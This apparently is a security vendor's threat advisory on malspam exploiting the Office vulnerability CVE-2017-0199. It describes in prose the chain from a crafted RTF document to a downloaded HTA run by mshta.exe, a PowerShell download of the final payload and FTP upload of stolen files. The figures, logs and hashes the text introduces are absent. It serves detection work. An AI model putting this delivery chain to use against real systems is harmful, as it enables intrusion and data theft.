Over the past few weeks, RSA FirstWatch noticed an uptick of malspam trying to exploit CVE-2017-0199 to deliver malicious payloads to victim machines. Microsoft already issued a patch to address the vulnerability in the affected Office products. Un-patched systems are still at risk of getting infected with whatever piece of malware the malspam is distributing at a given point.
The attack starts with a crafted office document. It has an embedded OLE2 link object. If opened in a vulnerable application, an HTTP(s) request is issued to retrieve a malicious HTML Application (HTA). The HTA handler, mshta.exe, is then called to execute the downloaded script which in turn downloads and execute the final payload.
In this threat advisory we will discuss how RSA NetWitness suite sees the host and network behavior of a couple of delivery documents trying to exploit CVE-2017-0199.
First delivery document was noticed on August 29th 2017. Opening the RTF document using an un-patched Microsoft Word led to the following network events:
Let's break those network sessions. First, a request was made to download an obfuscated script:
The downloaded script was handled by mshta.exe and another request followed to download an executable:
Next, the malware authenticates to an FTP server and uploads files to it. It also connects to the same server using custom TCP protocols:
Here's the meta registered by NetWitness packets for the HTTP sessions above:
Second delivery document was also noticed on August 29th 2017. Opening the malicious document using an un-patched Microsoft Word led to the following:
The scandata on NetWitness Endpoint is shown below:
On the host side, what's typical in this infection scenario is that Winword.exe looks up the handler for the downloaded HTA file through a COM object. The handler, mshta.exe, is called to execute the malicious script.
In this case the malicious script has a powershell command to download and save the final payload to the system. So powershell.exe is created to run the command:
The malware then proceeds to deliver its functionality:
Delivery documents (SHA256):